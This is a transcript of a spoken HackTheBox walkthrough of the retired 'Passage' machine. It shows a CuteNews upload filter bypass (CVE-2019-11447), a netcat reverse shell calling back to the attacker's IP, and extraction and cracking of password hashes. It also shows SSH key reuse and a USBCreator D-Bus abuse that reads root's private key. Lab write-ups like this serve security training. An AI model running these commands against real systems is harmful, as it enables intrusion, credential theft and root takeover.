Welcome back, everybody. This is Justin with Parity InfoSec, and I'm here with a new retirement passage from HackTheBox. This box was not too difficult. It was rated a medium, and the difficulty generally went back to just trying to find what you needed to exploit. The exploits themselves are not hard. There's several where it's copy-paste. It really isn't anything difficult, but you had to know what you were looking for. So I'm going to show you how we enumerated this box to find there's a CVE on CuteNews, but I personally did this box manually by doing a PHP upload filter bypass. Similar application, just took me a little bit longer, and I'll show you a little bit of that. And with that, I will also show how I found the same information that the CVE I'm going to show you found in terms of tracking down passwords. And getting them over to John and Crackstation. With all that, we'll have to do a couple rounds of Linpeas, try and look for stuff, but user 1 to user 2 was super CTF-y, and it came down to SSH key reuse, which you never see. But we'll search through the logs, find the information we need, and then we'll go after another oddball, which is the DBus USB creator. Has a privilege escalation opportunity. All in all, this box isn't too bad, so let's get started. So let's begin with our NMap, and this one is going to be 10.10.10.206, which you can see up there by my folder name. It's running two ports that we can see, SSH and HTTP on port 80. So let's take a look at that website. And here it goes. It's called Passage News. It has some default text. A lot of this is default text. There's a couple of usernames. Kim Swift. There's an admin. And there's a note here about implemented fail to ban. So due to large amounts of traffic, we've implemented fail to ban. Excessive access to our server will be met with a 2-minute ban on your IP address. So just something to keep in mind if you are going to try and brute force this machine. It is not going to go well. Looking at the page, down here at the bottom, you see that it's actually CuteNews. So CuteNews is a PHP news management system, and it runs RSS. And that's really what we're looking at here. I don't see anything else, but I'd like to know a little bit more about CuteNews. So if we come into some of these pages, like this one, we're looking to find out how do I get into the management side of the house. See if there's any kind of information here. A couple screenshots of what it should look like. But nothing is giving away too much of what we're looking for. So on this one, I'm just going to go here because I know what this is. It's CuteNews, and that gets you into the login. Not a big deal. You can find that online somewhere else, but CuteNews, it is running 2.1.2. So this is where you kind of hit an impasse. You can go one of either two ways. So if you say CuteNews 2.1.2 exploit, you will find that there is an exploit out there. It came out September 10th, right around the time that this box came out. Imagine that. But I didn't know about these right away. I went after just a standard attack. So I'm going to go ahead and show you that. To do it, you need to go in and register. So here I will register Parity InfoSec. It's too many letters and not enough letters at the same time. All right. And then info@parityinfosec.com. we'll go ahead and register this account. And we got in, and there's not a whole lot you can do here. So you can visit the site. I don't know if you noticed there, it does direct back to passage.htb. So this would be the opportunity to go in and do an Etsy hosts input. But this is the only time that I needed it in the entire box. So it's a nicety, but not a necessity. I just want to take a look at personal options, and here I can't change my username, can't change my email. I can change my password, my nickname. And then there's an opportunity to upload a file to make it my avatar. So my favorite is this. This is my normal command PHP. If I save changes, it's going to come back and say avatar is not correct. Not cool. Well, let's go to our burp. Let's turn intercept on. And I will try to upload the same file. And save changes. So we'll bring it up. We can see this is the post index. Here's all our information, and here's our edit avatar information. It's showing as a PHP, content type PHP, and a PHP code, and it doesn't like that. So if you've never tried this before, you can go in and do a search for PHP upload filter bypass. And NoBlite has a really good write-up on this. They put it out last year, but it goes through a lot of the things that you might have to do, and it depends on whether some things are whitelisted. You can do a php.jpg. You can try a bunch of these, but the one that you need for this box is the GIF workaround. So in order to do it, you need to put the header of GIF 89A. So I'm going to put that here. I'm going to see first if it'll do it on this. And it did successfully update. You come down here and it shows that it tried to load an image. But if you, let's view image. Let's turn our intercept off. Again, I said it goes to passage.htb, but if you come up here and you just replace it with the IP, it will work. 10.10.10.206. It comes here and I see that, but I don't see anything else. If I say, who am I? We are running as dub data. All right. Normally, when I get to this point, I want to try and upload my own files so that I can have full control of what I'm trying to do. So the first thing I need to do is get my PHP server running. So we'll open a new tab. And we'll go to var www.html. We'll do a Python 3 m http.server 80. Now that we got that running, we can come back over here and we can tell it to wget. So wget 10.10.14.9, and then we will ask for nc. Gives me a little pause. We'll just make sure it tried to get nc 200. Cool. If I do an ls, we now see that there is an NC in this folder. So chmod, give it executable to NC, good to go. And then now we need to set up a listener. I'll just do it on port 8888. And we'll run it from here. So NC 10.10.14.9 8888E and give me bit bash. You see it hangs because it's trying to process it, and it does open a connection. If I say ID, I got data. If I say who am I, same thing. but I want to upgrade my shell, so I'm going to say which Python. Oh, there is a Python, just standard Python. Great. So I'll do a Python C import pty spawn bin bash. We'll close that out. And now I have a slightly stronger shell. I'll be able to see some of the files and where I'm at. So we're sitting in CuteNews uploads. That's our directory that we processed all this in, but it's not necessarily our home directory. I'm gonna go ahead and just start with the basic enumeration. So cddev shm, and I will bring Linpeas over and get started with that. So 14.9 linpeas.sh, give that an executable as well. And then we'll run it. So this is our lowest privileged user right now. Up here at the top, I'm gonna go ahead and zoom out a little bit just to make it a little bit easier on the screen. So we see our host name, our user. We see our paths, all that information. We'll just keep scrolling down. For this one, we can look around for anything particular. You see that there's a user called nadav, and there's a lot of information for that, a lot of processes. You've got some root processes as well. And then right here, this is us coming in on the shell. Here's our Python that it launched. And then all this stuff is associated with Linpeas. So nothing crazy there. Got some red there, just processes running. Oh, we got a red yellow there. So there's a service file. So var www html CuteNews cdata rss config.php. This seems like it's interesting. So let's go back to var www html. We're gonna go into CuteNews and then cdata. So when I came in here, it was saying there was an rss config.php, but if you notice, it's 0. And then it really depends on what's running it, because if it's running on www data, I'm not going to get any kind of privilege exploit, any kind of upgrade. But there is a lot of additional information in here, backups, things like that. There's also a users.txt. Okay, doesn't show me too much. Users db php, that one, users db, comes back and just says you don't have access to open this, in case anybody tries to open that. Let's go into users and cat users.txt from here. I got nothing, so that's an empty file. But above it, there's another file called lines. And lines is a bunch of information, and really it's taken from the other files. So if you say cat star.php, that's where all that information came from. So even though there is one called lines, it all came from inside of the other files. So that's kind of interesting. It's just hanging out there. If you look at the documentation on this one, and we'll show it here in a minute when we go to the actual exploit that's out there, that is their way of checking passwords. It's just how it works. So I've got this kind of information, but I got to figure out how to look at it, how to use it, because it looks ugly. So here's where I'm going to take the opportunity to show you guys a little bit more of my cut technique. And then I'm going to inject a little sed to make it even nicer. Okay. So when I cut things, usually I try to find the first delimiter, last delimiter around what I'm trying to do. So if you see this, this is all one base64 encoded section, and then it has this less than symbol for the PHP die, and it constantly happens. Every time there is a base64 encode, there's that. So we're going to use that as our delimiter. So we will cat star, and then we will cut, and then the delimiter will be the less than symbol, and we want field 1. And when we do that, I just get these base64 fields. Cool. But I got a bunch of extra lines. Super annoying. So I cut this, but I got extra blank lines. The way you get rid of that is by doing a grep dot. So it is looking for something on that line, not nothing. When I do that, it compresses it all nice and neat into a section. Again, I am putting out all the files and not just one. So if I stuck to lines, that would be different. So if I say cat lines, and then do the cut D F1 grep dot, it'll be a little bit less information that I'm gonna have to deal with. See, it's just less lines in general. So this is the command that we're gonna use, but I've got to get that decoded from base64. So like I said at the beginning of this video, there's two ways. I'm gonna come in here and show you the easy way, and this is what I did originally. Is just come over here and do CyberChef. I don't recommend this if you have any kind of sensitive data or if you don't know what the data is. For these CTF boxes, not a big deal. And you're gonna say from base64. As you come in here, it's gonna show you different chunks of data saying this is Paul at passage.htb. And then there's information about egress, admin, and then it's gonna say here's nadav, and then it gives different information. So name, ACL, email, and then this field is called pass, and that looks like it's a hashed password. Not all the files have it, so it's not necessarily something we gotta look for. So this is where sed comes in a little bit, where I can try and play around with it. But to do that, I want to say for L in, and then I'm going to run that command. I don't still have it, darn. Alright. And I got to kill that to get back out. So we'll kick this back off again, and I'll show you how to do that. And this is where you're going to want to get into a better shell. Given some time, we should be able to get one here pretty soon. All right. So this was in cdata users cat lines. Okay. So we'll try that again. Cat lines. But we're going to run it as a for loop. So to do this, I will open Genie just so that I can show it and then just copy and paste it in. So what we were running was cat lines and then cut with the delimiter of a less than, F1 for the field, grep dot for getting rid of all the junk lines. So with that, we can put the whole thing into some brackets, and we can say for L for line in, and then run that. Do, we're gonna say echo L. We're gonna pipe that into base64-D, and then we'll say done. That should be our whole code, little one-liner. And we'll push it into the system and see what happens. And it worked. So this is getting us basically what CyberChef did. But it's really ugly. There's an issue with the way that this runs. So there's a simple way to fix that, and that is before the done for each loop, you want to say echo and then /r/n and then close it out with a done. So if I come back here and I do that again, you're going to see it breaks it. Now it does print rn, but it actually accomplishes what I was trying to do, which is new line, new line, new line. So we've got that kind of information. Right now is probably a good time to bring this back to my machine for editing. It's just going to be easier that way. So this is where we cut off from the command. So we'll copy that, and let's try to copy it again. There we go. Copy that, make a new, and we will go back to the 206 folder, and we'll just nano cdata. So that's all the data that we pulled out of there. Because I don't need it anymore, now I can do a replace, and I can just say replace rn with nothing. It's going to ask to do it. I'm going to say all. And now all those RNs are gone, but I did get my new lines. So if I say cat cdata, nice and neat, really easy to work with. Now we have to look at what is the opportunity for sed here. So sed allows you to use regular expressions to pull information out. If you know you're looking for email, you can kind of start it there. If you're looking for, like in my case, I'm looking for pass, but there's a bunch of junk on the front. I don't want that. So we know by looking at this that everything pass is 64, but we'll go ahead and take it one step further and say cat cdata, and then grep for pass. And that kind of shortens the list a bit, I think. Oh, we got a lot of passage too. So I'll say grep, and then I'm going to purposely put some escape characters in so that I get just the ones that actually are quote, double quote, pass, double quote. So it gets us a shorter list there. I know that I have a smaller list. So let's see if we can sed this. So sed, usually I'll try and run it as a normal substitution. And that'll be old text, new text. I'm going to be looking for some kind of old text. I'm going to substitute with the new text. And if you're just trying to delete things, like in this case, we're going to just delete things, you'd leave that blank. The old text that we're looking for is anything before you get this pass S64. To be super specific, we'll line it out, but I'm going to say caret, which means from the beginning of the line. Dot is any character. Star means as many as there are, until it finds this next section, which is going to be pass. And you've got to use the escape characters here. And then I'm going to say S:64:, and then I will put another escape character in there to make sure that I'm basically capturing from here to here. I want to make sure that this is the field I'm looking for, so I'm going to say starting here all the way until I see this to here, and then cut it off and delete that. So if I run it now, the beginning of the line is all gone, and all I see is this, and then whatever's on the back end. So for me, that's another case of I can set again, or I can just cut off of this double quote. I'm going to show a nifty little feature I learned, which is if you put a tac E and another tac E, it'll run multiple expressions, multiple regular expressions to eliminate. So here I would say S, and I want to take off double quote, so escape double, colon S, semicolon S, colon. So everything with that on. Oh, and you see it got rid of the S, colon, the semicolon, but it left the rest on. When you get to the end of this, you do need to run a dot star again to say any character for the rest. Now when I do it, I get a shorter list. And this short list is going to be a set of hashes. Normally for ease, I will just come in and copy this and go run it over through Crackstation. Again, this is one of those, if you have sensitive data, don't do this. But if you want to just crack some hashes, there we go. Didn't load the CAPTCHA. I come in here, I can see there's nothing found, nothing found. This is a SHA-256, this is a SHA-256. And I have the passwords of Atlanta1 and egress. I can do the same thing here. If I take all this information and I output it to pass or hashes, and then I just say John hashes word list equals user share word list rocku.txt. Oh, and then I have to define that it's format equals raw SHA-256, because we did see there was SHA-256. And it did come up with one password of Atlanta1. So Atlanta1 is a good password for something, someone. If we go to Crackstation, we're going to see that Atlanta1 is the E26F3E, or it ends in 73CD. So I already see 73CD. So this is the password for Paul. Paul at passage.htb. And we're already sitting on passage. If I say cat etc password, I'm going to see there is a user called Paul Coles. So we'll sue Paul, and we'll get Atlanta1, and we are Paul. We go to his home directory, list it out. We're going to see there is a user.txt. So cat user.txt, and we got user. Cool. That is the easy part. Now that I've shown you the whole process of how I got there, I'm going to show you the super easy way. It's unfortunate, but I mean, somebody went out and made it. So if we go back to this page and we go to the exploit, we just download this exploit. We're going to save it. You're going to see that it's going to ask for the URL. It's going to do the same thing. It's going to put a command line together into a payload, and then it's going to go through the process of encoding it. Here you see where it's looking for passwords, and this is the same thing that we just went through the process of said. So it's all been done, but I did it the harder way, I guess. It's also going to drop you a shell, and then it's going to give you the SHA-256 hashes that you can go back and crack, all packaged together nicely. So if I come over here, I can just do a copy from my downloads. That was 480.py. We're going to put it here. if I say Python 3, 480 pi, here's the CuteNews 212 RCE. I'm going to say HTTP 10.10.10.206. Who am I? It gives you a shell that fast, super fast. There's my shell as data. If I come up here, here are those 256 hashes that I found, which I was able to crack. So same outcome, ready-made. But I just want to show you like the manual process of going through it. So now we're sitting at Paul. Paul has user.txt. Paul also has no bash history, but my favorite is he's got SSH. So let's go cd SSH lsla. And he does have keys, so you can either inject into the authorized keys or you can pull down his private key, so ID RSA underscore RSA. And we'll go ahead and copy that. Go back to our box. I'm going to exit out of this. And we'll nano ID RSA. Anytime you're using an ID RSA key, you need to chmod to 600. Now let's SSH Paul at 10.10.10.206, and then tell it to use the ID RSA key. And we're in. So now we have a much better SSH terminal. We're moving on up. If I look at the folders, there's not a whole lot of information. I can't pull anything down. If I go through, I can do a dev shm Linpeas and see what it says about Paul. Always try to find these, but remember that common things in green can be important too. So there's a lot of stuff that'll come up. So path, nothing major there. Keep coming down. There's nothing significant in this section, but now you'll start to see more actions from us. The bash, the dev shm, Linpeas, the aux, sort, that's all functions of Linpeas. Not too concerned about the binary permissions. This is all the same kind of information that we saw in data. So we're trying to figure out is what can this user do more so than any other user. Got the same file there that it talks about. And I'll be honest with you, it's not here. It's nowhere to be found. This is one of the hardest CTF parts of this box. What if I tried to do nadav Atlanta 1. That's not going to work. Okay. We will cat etc password again. Just make sure there's no other users. So you got Paul, nadav, yeah, USB mux, sane ID, but nothing else. This is the part that gets frustrating. If I say exit, and I just try this, nadav, it lets you into nadav. There's no better answer other than they use the same RSA key. They share the same password sometimes, so in this case they share the same ID RSA key. I don't agree with this, but that part of the box is really frustrating. And I don't want to get caught up too much in that one. Just know that it's there. You can always keep that out, keep an eye out for that when you're doing boxes. But now we will try another Linpeas. And I'm going to make it a little bit smaller. No. All right, now it's taken off on me. Let's take a look at some of these files. All the same information. We got to pay a little bit more attention to the processes now that we're at nadav. And here we go. So there's GPG agent. It's using a couple daemons here. It's got a dbus daemon. It's running some session services, Nautilus, Evolution, Zeitgeist. But I'm not seeing much there. Let's go back up a little bit higher on the list. So there's some more bus information, iBus, DBus. Just kind of keep that in mind. It is running as sudo, so group sudo. You do see that this group has access to the DBus. We're starting to see some indicators that we got to keep an eye out for. I'm going to go ahead and stop this. I'm going to go back and take a look at this directory. So this directory has no bash. Obviously it doesn't have root in this folder, but it does have an additional file that we don't see too often, which is a viminfo file. So we will cat viminfo. It does not show up on the Linpeas because it's limited to 20 files in the folder when it displays your folder, and magically enough, viminfo falls underneath that 20. So always make sure not just use those enumeration tools, go back and manually enumerate for yourself. And when we cat this, you can see this file is used to basically serve as the history file for Vim. So you can see what that user was doing in Vim. With this one, it comes down to the bottom where you start to see the file marks. Okay, something was done with this USB creator, DBus. Keep coming down, USB creator, and made some edits and changes. So there's a couple different things in there. What is USB creator? USB creator. It's a utility, helps, well, this is Rufus, but it's the ability to interface with a USB drive, essentially. So you can, I think you can create files, install and run startup disk, alias USB creator, things like that. But it's a DBus interface to allow, in this case, to allow you to run across that bus and access files. If you look for an exploit, because again, Google that stuff, you're going to see Palo Alto came out with a pretty cool exploit. This was in last July. And it's not really an exploit, more of an abuse. So it does say that you can bypass the password security policy of sudo. You're going to do it through an arbitrary file write. So you're able to write files as root without supplying a password. And by this, you can do data leakage and do all kinds of stuff. You can set passwords, you can do whatever, read the shadow file. I'm going to show you a couple different ways that I'm going to use it. But it's just showing through this document. It's going to execute a method, and that method is going to have an input and an output. I just want to note here, here's nadav. If you didn't think this was the right one, this is getting closer because now we see nadav. So this was made by the person that really went into the box. And you're going to see that this one is going after a vulnerable service, com.ubuntu.USBCreator. You come in here and you're going to see a lot of the same stuff. So Python 3 running USB creator. We come back into this box and we say ps aux, and we grep for USB. Grep I. No. Huh, it's not showing up right now. So you would be able to see this Python 3. I guess it's USB dash, but either way, let's psaux and then grep for Python. Huh. I'm seeing fail to ban, but I'm not seeing the other DBus running. So hopefully this will work and it's not an issue with the box. But you're going to see that there's a condition in here, the pollkit configuration file. It's going to give it sudo write, and then you're able to access the USB creator image, and it'll do things through the built-in dd function. But essentially, we'll view this image. This is the line that we're trying to run. We're going to call the system, and this is the destination. The object path is going to be the USB creator. The method is going to be USB creator image, and then here's your input file, your output file, and then true. And so in this case, they showed hello world was in the a.text. If you were to look at a.text, it had all that information. But when you ran this function, you see it now renamed it as root, being the owner. So just a little wonky. This is going to be another thing that I'm going to add into Genie just so you can see it. So gdbus call system, and the destination is going to be com.ubuntu.USBCreator. The object path is going to be /com ubuntu/USBCreator. I'll tell you right now, if you forget that first slash, it will not work. I tried it. I made that mistake. Don't do dumb things like me. All right. This will be method. I just did that so I could copy it over, and then I'll just put in .image. Now, this is where we go source. So my source is going to be root. And I'm going to skip ahead because I don't want to just pull root.txt. That's no fun. Let's look for the SSH key, ID RSA. And then I want to put that into deb shm ID RSA true. So if this runs successfully, we should see these two braces here. Let's see what happens. No. gdbus call system dest object. Well, I don't think there's an object. And that time it works. So we've got two brackets. Let's go to dev shm just to make it easy. ls, there is an ID RSA key in there. So ls-lia, you're going to see the ID RSA key was written by root, but it's readable by everyone. So if I cat ID RSA, I've got a private key. Go ahead and copy this. Hopefully it worked. Let's try that again. Sometimes the copy does not work right. We'll copy that. And we're sitting in nadav on that terminal. Let's go ahead and exit this because we have what we need. So I'll just do nano root ID RSA. Put this in here, and we know that that's the root one, so let's SSH root at 10.10.10.206. And then the key we're gonna give it is root ID RSA. But I forgot to chmod it. I think I mentioned that earlier, so just remember, modify it to 0600 root and then try it again. And now we're root. So if I do an lslia, we see that there is viminfo here as well, but I can just cat root.txt, and we've got root. If I cat viminfo, you're going to see some other configuration changes that were made throughout, none that really apply to us, but we got the root. So appreciate you for being here for this box. That one wasn't too bad, about 45 minutes from start to finish. There was a little bit of information in there about how to search. So using sed, using grep, cut, kind of combining all those. It's something I generally try to learn a little bit more every time, but I try to pass that information on as well, because cutting through all the junk information is the most important part when you're trying to do manual enumeration. Either way, I showed you the manual path for getting through the CuteNews and doing a PHP upload filter bypass. I also showed you the exploit that was out there. This is all for CVE 2019-11447. We talked a little bit about the SSH key reuse, which is how we got from user 1 to user 2. Search through those logs a little bit more, search through the viminfo, kind of piece the picture together that it had something to do with DBus, USB creator, and if you just do Google, you'll find that information pretty easily. Cracked a couple passwords, but all in all, pretty easy box. I want to say thank you to Chef Bison for putting this box together. I know that it takes a lot of time to do that. I've been looking into it myself, so I appreciate every single box owner that takes that time to put these out. For the rest of you guys, it's been a great week. I hope to see you guys again next week. Have a great time.